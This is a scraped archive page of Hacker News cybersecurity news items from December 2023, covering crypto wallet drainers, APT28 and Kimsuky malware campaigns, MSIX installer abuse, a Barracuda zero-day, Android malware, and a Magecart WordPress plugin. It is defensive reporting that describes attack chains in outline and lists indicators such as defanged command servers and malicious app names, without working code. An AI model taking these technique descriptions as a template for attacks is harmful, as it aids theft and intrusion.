31.12.23 Cryptocurrency The Hacker News
Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets.
ARTICLES December 2023 (100)
H MARCH(103) APRIL(113) MAY(110) JUNE(93) July(113) November(58) December(100) VIRUS BULLETIN 2023
Beware: Scam-as-a-Service Aiding Cybercriminals in Crypto Wallet-Draining Attacks
31.12.23 Cryptocurrency The Hacker News
Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets.
"These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said.
A prominent contributor to this troubling trend is a notorious phishing group called Angel Drainer, which advertises a "scam-as-a-service" offering by charging a percentage of the stolen amount, typically 20% or 30%, from its collaborators in return for providing wallet-draining scripts and other services.
In late November 2023, a similar wallet-draining service known as Inferno Drainer announced that it was shutting down its operations for good after helping scammers plunder over $70 million worth of crypto from 103,676 victims since its launch in late 2022.
Web3 anti-scam solution provider Scam Sniffer, in May 2023, described the vendor as specializing in multi-chain scams and charging 20% of the stolen assets.
"It has been a long ride with all of you and we'd like to thank you from heart [sic]," the actor said in a message posted on its Telegram channel.
"A big thanks to everyone who has worked with us such as Drakan and every other customer, we hope you can remember us as the best drainer that has ever existed and that we succeeded in helping you in the quest of making money."
At the crux of these services is a crypto-draining kit that's crafted to facilitate cyber theft by illegally transferring cryptocurrency from victims' wallets without their consent.
This is typically accomplished via airdrop or phishing scams, tricking targets into connecting their wallets on counterfeit websites that are propagated via malvertising schemes or unsolicited emails and messages on social media.
Earlier this month, Scam Sniffer detailed a phishing scam in which bogus ads for cryptocurrency platforms on Google and X (formerly Twitter) redirected users to sketchy sites that drained funds from users' digital wallets.
"The user is induced to interact with a malicious smart contract under the guise of claiming the airdrop, which stealthily increases the attacker's allowance through functions like approve or permit," Check Point noted.
"Unknowingly, the user grants the attacker access to their funds, enabling token theft without further user interaction. Attackers then use methods like mixers or multiple transfers to obscure their tracks and liquidate the stolen assets."
To mitigate the risks posed by such scams, users are recommended to employ hardware wallets for enhanced security, verify the legitimacy of smart contracts, and periodically review wallet allowances for signs of any suspicious activity.
Albanian Parliament and One Albania Telecom Hit by Cyber Attacks
29.12.23 BigBrothers The Hacker News
The Assembly of the Republic of Albania and telecom company One Albania have been targeted by cyber attacks, the country's National Authority for Electronic Certification and Cyber Security (AKCESK) revealed this week.
"These infrastructures, under the legislation in force, are not currently classified as critical or important information infrastructure," AKCESK said.
One Albania, which has nearly 1.5 million subscribers, said in a Facebook post on December 25 that it had handled the security incident without any issues and that its services, including mobile, landline, and IPTV, remained unaffected.
AKCESK further noted that the intrusions did not originate from Albanian IP addresses, adding it managed to "identify potential cases in real-time."
The agency also said that it has been focusing its efforts on identifying the source of the attacks, recovering compromised systems, and implementing security measures to prevent such incidents from happening again in the future.
What's more, AKCESK said the incident has prompted it to review and strengthen its cybersecurity strategies.
The exact scale and scope of the attacks are currently not known, but an Iranian hacker group called Homeland Justice claimed responsibility on its Telegram channel, alongside stating that it had hacked flag carrier airline Air Albania.
In a message shared on its website on December 24, the outfit said it is "back to destroy supporters of terrorists," alongside adding the following tags: #albania, #albaniahack, #CyberAttacks, #mek, #MKO, #ncri, #NLA, #pmoi, #Terrorists.
The development comes more than a year after Albanian government services were targeted by destructive cyber attacks in mid-July 2022.
Homeland Justice claimed responsibility for those attacks as well. The development subsequently prompted the U.S. government to sanction Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmail Khatib, for engaging in cyber-enabled activities against the U.S. and its allies.
CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK
29.12.23 Virus The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.
The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document.
However, to the contrary, the links redirect to malicious web resources that abuse JavaScript and the "search-ms:" URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands to activate an infection chain for a new malware known as MASEPIE.
MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol.
The attacks further pave the way for the deployment of additional malware, including a PowerShell script called STEELHOOK that's capable of harvesting web browser data and exporting it to an actor-controlled server in Base64-encoded format.
Also delivered is a C#-based backdoor dubbed OCEANMAP that's designed to execute commands using cmd.exe.
"The IMAP protocol is used as a control channel," CERT-UA said, adding persistence is achieved by creating a URL file named "VMSearch.url" in the Windows Startup folder.
"Commands, in Base64-encoded form, are contained in the 'Drafts' of the corresponding email directories; each of the drafts contains the name of the computer, the name of the user and the version of the OS. The results of the commands are stored in the inbox directory."
The agency further pointed out that reconnaissance and lateral movement activities are carried out within an hour of the initial compromise by taking advantage of tools like Impacket and SMBExec.
The disclosure comes weeks after IBM X-Force revealed APT28's use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.
In recent weeks, the prolific Kremlin-backed hacking group has also been attributed to the exploitation of a now-patched critical security flaw in its Outlook email service (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims' accounts within Exchange servers.
Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks
29.12.23 APT The Hacker News
Nation-state actors affiliated to North Korea have been observed using spear-phishing attacks to deliver an assortment of backdoors and tools such as AppleSeed, Meterpreter, and TinyNuke to seize control of compromised machines.
South Korea-based cybersecurity company AhnLab attributed the activity to an advanced persistent threat group known as Kimsuky.
"A notable point about attacks that use AppleSeed is that similar methods of attack have been used for many years with no significant changes to the malware that are used together," the AhnLab Security Emergency Response Center (ASEC) said in an analysis published Thursday.
Kimsuky, active for over a decade, is known for its targeting of a wide range of entities in South Korea, before expanding its focus to include other geographies in 2017. It was sanctioned by the U.S. government late last month for amassing intelligence to support North Korea's strategic objectives.
The threat actor's espionage campaigns are realized through spear-phishing attacks containing malicious lure documents that, upon opening, culminate in the deployment of various malware families.
One such prominent Windows-based backdoor used by Kimsuky is AppleSeed (aka JamBog), a DLL malware which has been put to use as early as May 2019 and has been updated with an Android version as well as a new variant written in Golang called AlphaSeed.
AppleSeed is designed to receive instructions from an actor-controlled server, drop additional payloads, and exfiltrate sensitive data such as files, keystrokes, and screenshots. AlphaSeed, like AppleSeed, incorporates similar features but has some crucial differences as well.
"AlphaSeed was developed in Golang and uses chromedp for communications with the [command-and-control] server," ASEC said, in contrast to AppleSeed, which relies on HTTP or SMTP protocols. Chromedp is a popular Golang library for interacting with the Google Chrome browser in headless mode through the DevTools Protocol.
There is evidence to suggest the Kimsuky has used AlphaSeed in attacks since October 2022, with some intrusions delivering both AppleSeed and AlphaSeed on the same target system by means of a JavaScript dropper.
Also deployed by the adversary are Meterpreter and VNC malware such as TightVNC and TinyNuke (aka Nuclear Bot), which can be leveraged to take control of the affected system.
The development comes as Nisos said it discovered a number of online personas on LinkedIn and GitHub likely used by North Korea's information technology (IT) workers to fraudulently obtain remote employment from companies in the U.S. and act as a revenue-generating stream for the regime and help fund its economic and security priorities.
"The personas often claimed to be proficient in developing several different types of applications and have experience working with crypto and blockchain transactions," the threat intelligence firm said in a report released earlier this month.
"Further, all of the personas sought remote-only positions in the technology sector and were singularly focused on obtaining new employment. Many of the accounts are only active for a short period of time before they are disabled."
North Korean actors, in recent years, have launched a series of multi-pronged assaults, blending novel tactics and supply chain weaknesses to target blockchain and cryptocurrency firms to facilitate the theft of intellectual property and virtual assets.
The prolific and aggressive nature of the attacks points to the different ways the country has resorted in order to evade international sanctions and illegally profit from the schemes.
"People tend to think, … how could the quote-unquote 'Hermit Kingdom' possibly be a serious player from a cyber perspective?," CrowdStrike's Adam Meyers was quoted as saying to Politico. "But the reality couldn't be further from the truth."
Microsoft Disables MSIX App Installer Protocol Widely Used in Malware Attacks
29.12.23 Virus The Hacker News
Microsoft on Thursday said it's once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware.
"The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution," the Microsoft Threat Intelligence team said.
It further noted that several cybercriminals are offering a malware kit for sale as a service that leverages the MSIX file format and ms-appinstaller protocol handler. The changes have gone into effect in App Installer version 1.21.3421.0 or higher.
The attacks take the form of signed malicious MSIX application packages that are distributed via Microsoft Teams or malicious advertisements for legitimate popular software on search engines like Google.
At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mid-November 2023, using it as an entry point for follow-on human-operated ransomware activity -
Storm-0569, an initial access broker which propagates BATLOADER through search engine optimization (SEO) poisoning with sites spoofing Zoom, Tableau, TeamViewer, and AnyDesk, and uses the malware to deliver Cobalt Strike and handoff the access to Storm-0506 for Black Basta ransomware deployment.
Storm-1113, an initial access broker that uses bogus MSIX installers masquerading as Zoom to distribute EugenLoader (aka FakeBat), which acts as a conduit for a variety of stealer malware and remote access trojans.
Sangria Tempest (aka Carbon Spider and FIN7), which uses Storm-1113's EugenLoader to drop Carbanak that, in turn, delivers an implant called Gracewire. Alternatively, the group has relied on Google ads to lure users into downloading malicious MSIX application packages from rogue landing pages to distribute POWERTRASH, which is then used to load NetSupport RAT and Gracewire.
Storm-1674, an initial access broker that sends fake landing pages masquerading as Microsoft OneDrive and SharePoint through Teams messages using the TeamsPhisher tool, urging recipients to open PDF files that, when clicked, prompts them to update their Adobe Acrobat Reader to download a malicious MSIX installer that contains SectopRAT or DarkGate payloads.
Microsoft described Storm-1113 as an entity that also dabbles in "as-a-service," providing malicious installers and landing page frameworks mimicking well-known software to other threat actors such as Sangria Tempest and Storm-1674.
In October 2023, Elastic Security Labs detailed another campaign in which spurious MSIX Windows app package files for Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex were used to distribute a malware loader dubbed GHOSTPULSE.
This is not the first time Microsoft has disabled the MSIX ms-appinstaller protocol handler in Windows. In February 2022, the tech giant took the same step to prevent threat actors from weaponizing it to deliver Emotet, TrickBot, and Bazaloader.
"Threat actors have likely chosen the ms-appinstaller protocol handler vector because it can bypass mechanisms designed to help keep users safe from malware, such as Microsoft Defender SmartScreen and built-in browser warnings for downloads of executable file formats," Microsoft said.
Chinese Hackers Exploited New Zero-Day in Barracuda's ESG Appliances
27.12.23 Exploit The Hacker News
Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoor on a "limited number" of devices.
Tracked as CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library Spreadsheet::ParseExcel that's used by the Amavis scanner within the gateway.
The company attributed the activity to a threat actor tracked by Google-owned Mandiant as UNC4841, which was previously linked to the active exploitation of another zero-day in Barracuda devices (CVE-2023-2868, CVSS score: 9.8) earlier this year.
Successful exploitation of the new flaw is accomplished by means of a specially crafted Microsoft Excel email attachment. This is followed by the deployment of new variants of known implants called SEASPY and SALTWATER that are equipped to offer persistence and command execution capabilities.
Barracuda said it released a security update that has been "automatically applied" on December 21, 2023, and that no further customer action is required.
It further pointed out that it "deployed a patch to remediate compromised ESG appliances which exhibited indicators of compromise related to the newly identified malware variants" a day later. It did not disclose the scale of the compromise.
That said, the original flaw in the Spreadsheet::ParseExcel Perl module (version 0.65) remains unpatched and has been assigned the CVE identifier CVE-2023-7101, necessitating that downstream users take appropriate remedial action.
According to Mandiant, which has been investigating the campaign, a number of private and public sector organizations located in at least 16 countries are estimated to have been impacted since October 2022.
The latest development once again speaks to UNC4841's adaptability, leveraging new tactics and techniques to retain access to high priority targets as existing loopholes get closed.
New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices
27.12.23 OS The Hacker News
A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices.
Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives.
It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill.
The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said.
The cybersecurity firm said it identified 25 apps that come with this active threat, some of which were distributed on the official Google Play Store since mid-2020. The apps are estimated to have been installed at least 327,000 times.
A majority of the infections have been reported in Brazil, Argentina, the U.K., Australia, the U.S., Mexico, and other parts of Europe and the Americas. Some of the apps are listed below -
Essential Horoscope for Android (com.anomenforyou.essentialhoroscope)
3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft)
Logo Maker Pro (com.vyblystudio.dotslinkpuzzles)
Auto Click Repeater (com.autoclickrepeater.free)
Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator)
Sound Volume Extender (com.muranogames.easyworkoutsathome)
LetterLink (com.regaliusgames.llinkgame)
NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com.Ushak.NPHOROSCOPENUMBER)
Step Keeper: Easy Pedometer (com.browgames.stepkeepereasymeter)
Track Your Sleep (com.shvetsStudio.trackYourSleep)
Sound Volume Booster (com.devapps.soundvolumebooster)
Astrological Navigator: Daily Horoscope & Tarot (com.Osinko.HoroscopeTaro)
Universal Calculator (com.Potap64.universalcalculator)
Xamalicious, which typically masquerades as health, games, horoscope, and productivity apps, is the latest in a long list of malware families that abuse Android's accessibility services, requesting users' access to it upon installation to carry out its tasks.
"To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it's encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm," Ruiz noted.
Even more troublingly, the first-stage dropper contains functions to self-update the main Android package (APK) file, meaning it can be weaponized to act as spyware or banking trojan without any user interaction.
McAfee said it identified a link between Xamalicious and an ad-fraud app named Cash Magnet, which facilitates app download and automated clicker activity to illicitly earn revenue by clicking on ads.
"Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets," Ruiz said.
Android Phishing Campaign Targets India With Banker Malware#
The disclosure comes as the cybersecurity company detailed a phishing campaign that employs social messaging apps like WhatsApp to distribute rogue APK files that impersonate legitimate banks such as the State Bank of India (SBI) and prompt the user to install them to complete a mandatory Know Your Customer (KYC) procedure.
Once installed, the app asks the user to grant it SMS-related permissions and redirects to a fake page that only captures the victim's credentials but also their account, credit/debit card, and national identity information.
The harvested data, alongside the intercepted SMS messages, are forwarded to an actor-controlled server, thereby allowing the adversary to complete unauthorized transactions.
It's worth noting that Microsoft last month warned of a similar campaign that utilizes WhatsApp and Telegram as distribution vectors to target Indian online banking users.
"India underscores the acute threat posed by this banking malware within the country's digital landscape, with a few hits found elsewhere in the world, possibly from Indian SBI users living in other countries," researchers Neil Tyagi and Ruiz said.
Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining
27.12.23 Cryptocurrency The Hacker News
Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks.
"Threat actors can also choose to install only scanners and sell the breached IP and account credentials on the dark web," the AhnLab Security Emergency Response Center (ASEC) said in a report on Tuesday.
In these attacks, adversaries try to guess a server's SSH credentials by running through a list of commonly used combinations of usernames and passwords, a technique called dictionary attack.
Should the brute-force attempt be successful, it's followed by the threat actor deploying other malware, including scanners, to scan for other susceptible systems on the internet.
Specifically, the scanner is designed to look for systems where port 22 -- which is associated with the SSH service -- is active and then repeats the process of staging a dictionary attack in order to install malware, effectively propagating the infection.
Another notable aspect of the attack is the execution of commands such as "grep -c ^processor /proc/cpuinfo" to determine the number of CPU cores.
"These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before using them in attacks," ASEC said, adding there is evidence of such malicious software being used as early as 2021.
To mitigate the risks associated with these attacks, it's recommended that users rely on passwords that are hard to guess, periodically rotate them, and keep their systems up-to-date.
The findings come as Kaspersky revealed that a novel multi-platform threat called NKAbuse is leveraging a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel for DDoS attacks.
Carbanak Banking Malware Resurfaces with New Ransomware Tactics
26.12.23 Virus The Hacker News
The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics.
"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.
"Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software."
Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero.
Carbanak, detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate.
In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak.
The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. A total of 4,276 cases have been reported so far this year, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."
The company's data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks.
As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play contributed to 47% (or 206 attacks) of 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape for the near future.
"With one month of the year still to go, the total number of attacks has surpassed 4,000 which marks a huge increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year," Matt Hull, global head of threat intelligence at NCC Group, said.
The spike in ransomware attacks in November has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.
"The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."
While the shift is the result of a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft, last week, disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.
The development comes as Kaspersky revealed Akira ransomware's security measures prevent its communication site from being analyzed by raising exceptions while attempting to access the site using a debugger in the web browser.
The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver – CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, CVE-2023-28252 (CVSS scores: 7.8) – for privilege escalation.
Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies
26.12.23 Phishing The Hacker News
The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises.
Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year.
Cloud Atlas, active since at least 2014, is a cyber espionage group of unknown origin. Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia.
In December 2022, Check Point and Positive Technologies detailed multi-stage attack sequences that led to the deployment of a PowerShell-based backdoor referred to as PowerShower as well as DLL payloads capable of communicating with an actor-controlled server.
The starting point is a phishing message bearing a lure document that exploits CVE-2017-11882, a six-year-old memory corruption flaw in Microsoft Office's Equation Editor, to kick-start the execution of malicious payloads, a technique Cloud Atlas has employed as early as October 2018.
"The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets," Kaspersky noted in August 2019. "Unlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating."
F.A.C.C.T. described the latest kill chain as similar to the one described by Positive Technologies, with successful exploitation of CVE-2017-11882 via RTF template injection paving the way for shellcode that's responsible for downloading and running an obfuscated HTA file. The mails originate from popular Russian email services Yandex Mail and VK's Mail.ru.
The malicious HTML application subsequently launches Visual Basic Script (VBS) files that are ultimately responsible for retrieving and executing an unknown VBS code from a remote server.
"The Cloud Atlas group has been active for many years, carefully thinking through every aspect of their attacks," Positive Technologies said of the group last year.
"The group's toolkit has not changed for years—they try to hide their malware from researchers by using one-time payload requests and validating them. The group avoids network and file attack detection tools by using legitimate cloud storage and well-documented software features, in particular in Microsoft Office."
The development comes as the company said that at least 20 organizations located in Russia have been compromised using Decoy Dog, a modified version of Pupy RAT, attributing it to an advanced persistent threat actor it calls Hellhounds.
The actively maintained malware, besides allowing the adversary to remotely control the infected host, comes with a scriptlet designed to transmit telemetry data to an "automated" account on Mastodon with the name "Lamir Hasabat" (@lahat) on the Mindly.Social instance.
"After materials on the first version of Decoy Dog were published, the malware authors went to a lot of effort to hamper its detection and analysis both in traffic and in the file system," security researchers Stanislav Pyzhov and Aleksandr Grigorian said.
British LAPSUS$ Teen Members Sentenced for High-Profile Attacks
24.12.23 Attack The Hacker News
Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies.
Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported. Kurtaj, who is autistic, was deemed unfit to stand trial.
Another LAPSUS$ member, a 17-year-old unnamed minor, was sentenced to an 18-month-long Youth Rehabilitation Order, including a three-month intensive supervision and surveillance requirement. He was found guilty of two counts of fraud, two Computer Misuse Act offenses, and one count of blackmail.
Both defendants were initially arrested in January 2022, and then released under investigation. They were re-arrested in March 2022. While Kurtaj was later granted bail, he continued to attack various companies until he was arrested again in September.
The attack spree, which took place between August 2020 and September 2022, targeted BT, EE, Globant, LG, Microsoft, NVIDIA, Okta, Revolut, Rockstar Games, Samsung, Ubisoft, Uber, and Vodafone.
LAPSUS$ is said to comprise members from the U.K. and Brazil. A third member of the group, also suspected to be a teen, was arrested in the South American nation in October 2022.
A report published by the U.S. Department of Homeland Security's (DHS) Cyber Safety Review Board (CSRB) this year revealed the threat actor's use of SIM-swapping attacks to take over victim accounts and infiltrate target networks. It also used a Telegram channel to publicize its operations and extort its victims.
Over the past year, the notoriety attracted by LAPSUS$ has also led to the emergence of another group called Scattered Spider. Both groups are part of a larger entity that calls itself the Comm.
Cybersecurity
According to the Federal Bureau of Investigation, the Comm consists of a "geographically diverse group of individuals, organized in various subgroups, all of whom coordinate through online communication applications such as Discord and Telegram" to engage in corporate intrusions, SIM swapping, crypto theft, real-life violence, and swatting.
"This case serves as an example of the dangers that young people can be drawn towards whilst online and the serious consequences it can have for someone's broader future," Amanda Horsburgh, detective chief superintendent from the City of London Police, said.
"Many young people wish to explore how technology works and what vulnerabilities exist. This can include learning to code, interacting with like-minded individuals online and experimenting with tools. Unfortunately, the digital world can also be tempting to young people for the
Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft
23.12.23 Crime The Hacker News
Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.
The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.
"As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin said. "In this case, comments claim the code to be 'WordPress Cache Addons.'"
Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.
Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel.
"Since the only way to remove any of the mu-plugins is by manually removing the file the malware goes out of its way to prevent this," Martin explained. "The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use."
The fraudulent plugin also comes with an optionF to create and hide an administrator user account from the legitimate website admin to avoid raising red flags and have sustained access to the target for extended periods of time.
The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.
"Since many WordPress infections occur from compromised wp-admin administrator users it only stands to reason that they've needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess," Martin said.
The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that alerts users of an unrelated security flaw in the web content management system and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.
Sucuri said that the threat actors behind the campaign are leveraging the "RESERVED" status associated with a CVE identifier, which happens when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details are yet to be filled.
It also comes as the website security firm discovered another Magecart campaign that uses the WebSocket communications protocol to insert the skimmer code on online storefronts. The malware then gets triggered upon clicking a fake "Complete Order" button that's overlaid on top of the legitimate checkout button.
Europol's spotlight report on online fraud released this week described digital skimming as a persistent threat that results in the theft, re-sale, and misuse of credit card data. "A major evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect," it said.
The E.U. law enforcement agency said it also notified 443 online merchants that their customers' credit card or payment card data had been compromised via skimming attacks.
Group-IB, which also partnered with Europol on the cross-border cybercrime fighting operation codenamed Digital Skimming Action, said it detected and identified 23 families of JS-sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, which were used against companies in 17 different countries across Europe and the Americas.
"In total, 132 JS-sniffer families are known, as of the end of 2023, to have compromised websites worldwide," the Singapore-headquartered firm added.
That's not all. Bogus ads on Google Search and Twitter for cryptocurrency platforms have been found to promote a cryptocurrency drainer named MS Drainer that's estimated to have already plundered $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.
"By targeting specific audiences through Google search terms and the following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost," ScamSniffer said.
Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities
23.12.23 Virus The Hacker News
Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering.
The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE.
"New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said.
Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan.
SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, and DRat.
Other recent attack chains documented by ThreatMon have employed decoy Microsoft PowerPoint files as well as specially crafted RAR archives susceptible to CVE-2023-38831 for malware delivery, enabling unbridled remote access and control.
"The SideCopy APT Group's infection chain involves multiple steps, each carefully orchestrated to ensure successful compromise," ThreatMon noted earlier this year.
The latest set of attacks commences with a phishing email, leveraging social engineering techniques to trick victims into interacting with malicious PDF files that drop Rust-based payloads for enumerating the file system in the background while displaying the decoy file to the victim.
Besides amassing files of interest, the malware is equipped to collect system information and transmit them to the C2 server but lacks the features of other advanced stealer malware available in the cybercrime underground.
A second infection chain identified by SEQRITE in December employs a similar multi-stage process but substitutes the Rust malware with a PowerShell script that takes care of the enumeration and exfiltration steps.
But in an interesting twist, the final-stage payload is launched via a Rust executable that goes by the name "Cisco AnyConnect Web Helper." The gathered information is ultimately uploaded to oshi[.]at domain, an anonymous public file-sharing engine called OshiUpload.
"Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups," Ram Prakki said.
The disclosure comes nearly two months after Cyble uncovered a malicious Android app utilized by the DoNot Team targeting individuals in the Kashmir region of India.
The nation-state actor, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is believed to be of Indian origin and has a history of utilizing Android malware to infiltrate devices belonging to people in Kashmir and Pakistan.
The variant examined by Cyble is a trojanized version of an open-source GitHub project called "QuranApp: Read and Explore" that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim's location.
"The DoNot group's relentless efforts to refine their tools and techniques underscore the ongoing threat they pose, particularly in their targeting of individuals in the sensitive Kashmir region of India," Cyble said.
Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware
23.12.23 Virus The Hacker News
A new phishing campaign is leveraging decoy Microsoft Word documents as bait to deliver a backdoor written in the Nim programming language.
"Malware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers' unfamiliarity can hamper their investigation," Netskope researchers Ghanashyam Satpathy and Jan Michael Alcantara said.
Nim-based malware has been a rarity in the threat landscape, although that has been slowly changing in recent years as attackers continue to either develop custom tools from scratch using the language or port existing versions of their nefarious programs to it.
This has been demonstrated in the case of loaders such as NimzaLoader, Nimbda, IceXLoader, as well as ransomware families tracked under the names Dark Power and Kanti.
The attack chain documented by Netskope begins with a phishing email containing a Word document attachment that, when opened, urges the recipient to enable macros to activate the deployment of the Nim malware. The email sender disguises themselves as a Nepali government official.
Once launched, the implant is responsible for enumerating running processes to determine the existence of known analysis tools on the infected host and promptly terminate itself should it find one.
Otherwise, the backdoor establishes connections with a remote server that mimics a government domain from Nepal, including the National Information Technology Center (NITC) and awaits further instructions. The command-and-control (C2) servers are no longer accessible -
mail[.]mofa[.]govnp[.]org
nitc[.]govnp[.]org
mx1[.]nepal[.]govnp[.]org
dns[.]govnp[.]org
"Nim is a statically typed compiled programming language," the researchers said. "Aside from its familiar syntax, its cross-compilation features allow attackers to write one malware variant and have it cross-compiled to target different platforms."
The disclosure comes as Cyble revealed a social engineering campaign that leverages messages on social media platforms to deliver a new Python-based stealer malware called Editbot Stealer that's designed to harvest and exfiltrate valuable data via an actor-controlled Telegram channel.
